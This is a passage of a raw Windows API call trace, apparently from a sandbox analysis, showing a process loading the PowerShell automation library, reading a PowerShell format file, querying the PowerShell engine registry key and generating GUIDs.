lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.476] GetLastError () returned 0x0 [0054.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.476] GetLastError () returned 0x0 [0054.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.476] GetLastError () returned 0x0 [0054.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.476] GetLastError () returned 0x0 [0054.476] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xe11e178, Data2=0x4622, Data3=0x4da8, Data4=([0]=0xb3, [1]=0xbe, [2]=0x5b, [3]=0x94, [4]=0x50, [5]=0xed, [6]=0xd3, [7]=0xc0))) returned 0x0 [0054.476] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x77826503, Data2=0x97eb, Data3=0x4ee0, Data4=([0]=0x86, [1]=0xa, [2]=0xef, [3]=0xf3, [4]=0xef, [5]=0x45, [6]=0x3d, [7]=0x12))) returned 0x0 [0054.476] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x11a3c689, Data2=0x98f5, Data3=0x4355, Data4=([0]=0xad, [1]=0xc1, [2]=0xa2, [3]=0x16, [4]=0x76, [5]=0x51, [6]=0x3f, [7]=0xa))) returned 0x0 [0054.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.476] GetLastError () returned 0x0 [0054.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.477] GetLastError () returned 0x0 [0054.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.477] GetLastError () returned 0x0 [0054.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.477] GetLastError () returned 0x0 [0054.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.477] GetLastError () returned 0x0 [0054.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.477] GetLastError () returned 0x0 [0054.477] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xaed2969e, Data2=0x1744, Data3=0x422d, Data4=([0]=0xa4, [1]=0x4d, [2]=0x7a, [3]=0x2a, [4]=0x16, [5]=0x40, [6]=0xa8, [7]=0xa6))) returned 0x0 [0054.477] VirtualQuery (in: lpAddress=0x2cd1f4, lpBuffer=0x2ce1f4, dwLength=0x1c | out: lpBuffer=0x2ce1f4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.477] GetLastError () returned 0x0 [0054.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.477] GetLastError () returned 0x0 [0054.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.477] GetLastError () returned 0x0 [0054.478] VirtualQuery (in: lpAddress=0x2cd1f4, lpBuffer=0x2ce1f4, dwLength=0x1c | out: lpBuffer=0x2ce1f4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.478] VirtualQuery (in: lpAddress=0x2cd230, lpBuffer=0x2ce230, dwLength=0x1c | out: lpBuffer=0x2ce230*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdbe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.478] GetLastError () returned 0x0 [0054.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.478] GetLastError () returned 0x0 [0054.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.478] GetLastError () returned 0x0 [0054.478] VirtualQuery (in: lpAddress=0x2cd1f4, lpBuffer=0x2ce1f4, dwLength=0x1c | out: lpBuffer=0x2ce1f4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.478] VirtualQuery (in: lpAddress=0x2cd230, lpBuffer=0x2ce230, dwLength=0x1c | out: lpBuffer=0x2ce230*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdbe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.478] GetLastError () returned 0x0 [0054.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.478] GetLastError () returned 0x0 [0054.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.478] GetLastError () returned 0x0 [0054.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.479] GetLastError () returned 0x0 [0054.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.479] GetLastError () returned 0x0 [0054.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.479] GetLastError () returned 0x0 [0054.479] VirtualQuery (in: lpAddress=0x2cd1f4, lpBuffer=0x2ce1f4, dwLength=0x1c | out: lpBuffer=0x2ce1f4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.479] VirtualQuery (in: lpAddress=0x2cd230, lpBuffer=0x2ce230, dwLength=0x1c | out: lpBuffer=0x2ce230*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.482] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x98aa3fbf, Data2=0x6d9f, Data3=0x4e11, Data4=([0]=0xa7, [1]=0x79, [2]=0xf, [3]=0xf, [4]=0x7d, [5]=0x20, [6]=0x1b, [7]=0x16))) returned 0x0 [0054.485] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x1566830e, Data2=0x9e86, Data3=0x476e, Data4=([0]=0x87, [1]=0xca, [2]=0x17, [3]=0x15, [4]=0x11, [5]=0x93, [6]=0xe5, [7]=0xe9))) returned 0x0 [0054.487] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x547f9b45, Data2=0x6385, Data3=0x4a53, Data4=([0]=0x8c, [1]=0xd1, [2]=0xd, [3]=0x20, [4]=0xfb, [5]=0x2c, [6]=0xb1, [7]=0xb8))) returned 0x0 [0054.487] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x2e739861, Data2=0x2998, Data3=0x4676, Data4=([0]=0x96, [1]=0xc, [2]=0xd9, [3]=0xbb, [4]=0x85, [5]=0xd9, [6]=0xb2, [7]=0xb4))) returned 0x0 [0054.488] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xad2e3879, Data2=0xec69, Data3=0x4b88, Data4=([0]=0x81, [1]=0x62, [2]=0x59, [3]=0x3d, [4]=0x6d, [5]=0x8d, [6]=0x2d, [7]=0x7f))) returned 0x0 [0054.488] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x8c1cf2ab, Data2=0xde33, Data3=0x4a37, Data4=([0]=0xa6, [1]=0xa6, [2]=0x58, [3]=0x1f, [4]=0x29, [5]=0xd6, [6]=0x7c, [7]=0x1d))) returned 0x0 [0054.488] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xb02f271d, Data2=0x94db, Data3=0x402a, Data4=([0]=0x83, [1]=0x1b, [2]=0x6a, [3]=0x78, [4]=0xd4, [5]=0xaa, [6]=0x72, [7]=0x69))) returned 0x0 [0054.489] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x3b6bdb61, Data2=0xa654, Data3=0x4a5e, Data4=([0]=0x8d, [1]=0xfa, [2]=0x80, [3]=0x2e, [4]=0xa3, [5]=0x29, [6]=0xa, [7]=0xc4))) returned 0x0 [0054.489] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x54982be1, Data2=0x8e41, Data3=0x405e, Data4=([0]=0x8d, [1]=0x51, [2]=0x46, [3]=0x71, [4]=0x37, [5]=0x73, [6]=0x68, [7]=0x54))) returned 0x0 [0054.489] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xd0d950fe, Data2=0x469b, Data3=0x474f, Data4=([0]=0x9d, [1]=0xc4, [2]=0x4b, [3]=0x73, [4]=0x1b, [5]=0x45, [6]=0x10, [7]=0x44))) returned 0x0 [0054.489] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0054.490] GetLastError () returned 0x0 [0054.490] GetFileType (hFile=0x31c) returned 0x1 [0054.490] SetErrorMode (uMode=0x1) returned 0x1 [0054.490] GetFileType (hFile=0x31c) returned 0x1 [0054.490] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.492] GetLastError () returned 0x0 [0054.492] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.493] GetLastError () returned 0x0 [0054.493] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.493] GetLastError () returned 0x0 [0054.493] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.493] GetLastError () returned 0x0 [0054.493] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.494] GetLastError () returned 0x0 [0054.494] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.494] GetLastError () returned 0x0 [0054.494] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.495] GetLastError () returned 0x0 [0054.495] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.495] GetLastError () returned 0x0 [0054.495] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.495] GetLastError () returned 0x0 [0054.496] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.496] GetLastError () returned 0x0 [0054.496] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.496] GetLastError () returned 0x0 [0054.496] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.496] GetLastError () returned 0x0 [0054.497] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.497] GetLastError () returned 0x0 [0054.497] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.497] GetLastError () returned 0x0 [0054.497] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.497] GetLastError () returned 0x0 [0054.497] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.497] GetLastError () returned 0x0 [0054.497] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.497] GetLastError () returned 0x0 [0054.500] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.500] GetLastError () returned 0x0 [0054.500] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.500] GetLastError () returned 0x0 [0054.500] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.500] GetLastError () returned 0x0 [0054.500] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.500] GetLastError () returned 0x0 [0054.500] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0xe67, lpOverlapped=0x0) returned 1 [0054.500] GetLastError () returned 0x0 [0054.500] ReadFile (in: hFile=0x31c, lpBuffer=0x326cd6b, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326cd6b*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.501] GetLastError () returned 0x0 [0054.501] ReadFile (in: hFile=0x31c, lpBuffer=0x326d764, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x326d764*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.501] GetLastError () returned 0x0 [0054.501] CloseHandle (hObject=0x31c) returned 1 [0054.501] GetLastError () returned 0x0 [0054.501] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce8d8 | out: phkResult=0x2ce8d8*=0x31c) returned 0x0 [0054.502] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x0, lpcbData=0x2ce91c*=0x0 | out: lpType=0x2ce920*=0x1, lpData=0x0, lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.502] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x3b8428, lpcbData=0x2ce91c*=0x56 | out: lpType=0x2ce920*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.502] RegCloseKey (hKey=0x31c) returned 0x0 [0054.505] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xf0dfbedb, Data2=0xbbd5, Data3=0x4d32, Data4=([0]=0xa7, [1]=0x7a, [2]=0x67, [3]=0x52, [4]=0xe3, [5]=0x50, [6]=0x4, [7]=0x61))) returned 0x0 [0054.505] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xde86ab1c, Data2=0x9e81, Data3=0x46b6, Data4=([0]=0xba, [1]=0xcd, [2]=0x44, [3]=0x6e, [4]=0x9, [5]=0x25, [6]=0x61, [7]=0x17))) returned 0x0 [0054.505] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x1b6c3632, Data2=0xaa18, Data3=0x47e6, Data4=([0]=0xb9, [1]=0x7a, [2]=0xe2, [3]=0x60, [4]=0x47, [5]=0xf7, [6]=0x84, [7]=0x18))) returned 0x0 [0054.505] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xccaca15c, Data2=0xbf68, Data3=0x44a3, Data4=([0]=0xa4, [1]=0x39, [2]=0xff, [3]=0x60, [4]=0x7e, [5]=0xb3, [6]=0xed, [7]=0x66))) returned 0x0 [0054.506] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x1686b17c, Data2=0x437c, Data3=0x4f9f, Data4=([0]=0xb5, [1]=0xda, [2]=0xea, [3]=0xf6, [4]=0x8c, [5]=0xc8, [6]=0xf6, [7]=0x6a))) returned 0x0 [0054.506] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xcdabb9a4, Data2=0x8ffa, Data3=0x46ff, Data4=([0]=0xb3, [1]=0x95, [2]=0x62, [3]=0xbd, [4]=0x1f, [5]=0x4b, [6]=0xeb, [7]=0xa0))) returned 0x0 [0054.506] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x7020fa6, Data2=0x2718, Data3=0x49bc, Data4=([0]=0xa3, [1]=0x7b, [2]=0xd6, [3]=0x9f, [4]=0x5f, [5]=0x58, [6]=0x40, [7]=0x94))) returned 0x0 [0054.506] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xe7bbdd5a, Data2=0x9f8c, Data3=0x416e, Data4=([0]=0x98, [1]=0xc1, [2]=0xa0, [3]=0x57, [4]=0x14, [5]=0x33, [6]=0x10, [7]=0x9e))) returned 0x0 [0054.506] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x9be14bc2, Data2=0x50e1, Data3=0x42c6, Data4=([0]=0x9c, [1]=0x33, [2]=0xb7, [3]=0xf7, [4]=0xf4, [5]=0x71, [6]=0xe5, [7]=0xf))) returned 0x0 [0054.506] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xada748e3, Data2=0xfa36, Data3=0x4ca5, Data4=([0]=0x9d, [1]=0xf7, [2]=0x98, [3]=0x1d, [4]=0xf5, [5]=0x5, [6]=0xd7, [7]=0xcd))) returned 0x0 [0054.506] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x31ff2418, Data2=0x354c, Data3=0x4741, Data4=([0]=0x8d, [1]=0xef, [2]=0xd0, [3]=0x48, [4]=0xb9, 